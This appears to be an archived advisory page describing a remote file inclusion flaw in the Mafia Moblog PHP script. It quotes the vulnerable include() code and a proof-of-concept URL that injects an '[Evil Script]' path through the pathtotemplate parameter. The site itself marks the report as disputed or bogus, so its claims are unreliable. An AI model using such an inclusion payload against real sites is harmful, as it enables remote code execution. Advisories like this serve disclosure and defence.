WARNING! Fake news / Disputed / BOGUS

Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability

2006.08.17
Credit: sh3ll
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-4156
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------ ------------------- Mafia Moblog pathtotemplate Remote File Inclusion ------------------------------------------------------------------------ ------------------- Author : Sh3ll Date : 2006/04/30 HomePage : http://www.sh3ll.ir Contact : sh3ll[at]sh3ll[dot]ir ------------------------------------------------------------------------ ------------------- Affected Software Description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Mafia Moblog version : 6 Venedor : http://mafia.pearlabs.org Class : Remote File Inclusion Risk : High Summary : A Free, Fully Customizeable, Open-Source MoBlog script that will run on any platform that is PHP and MySQL compatible. ------------------------------------------------------------------------ ------------------- Vulnerability: ~~~~~~~~~~~~~ The problem exists is in the big.php when used the variable $pathtotemplate in a include() function without being Declared. ----------------------------------------big.php------------------------- ------------------- ... <?php include("info.php"); include("template.php"); if (file_exists("$pathtotemplate/includes.php")) {include("$pathtotemplate/includes.php");} include("$pathtotemplate/big.php"); ?> ... ------------------------------------------------------------------------ ------------------- PoC: ~~~ http://www.target.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script] Solution: ~~~~~~~~ Sanitize Variabel $pathtotemplate in big.php ------------------------------------------------------------------------ ------------------- Note: ~~~~ venedor contacted, but no response. so do a dirty patch. ------------------------------------------------------------------------ ------------------- Shoutz: ~~~~~~ ~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena ~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top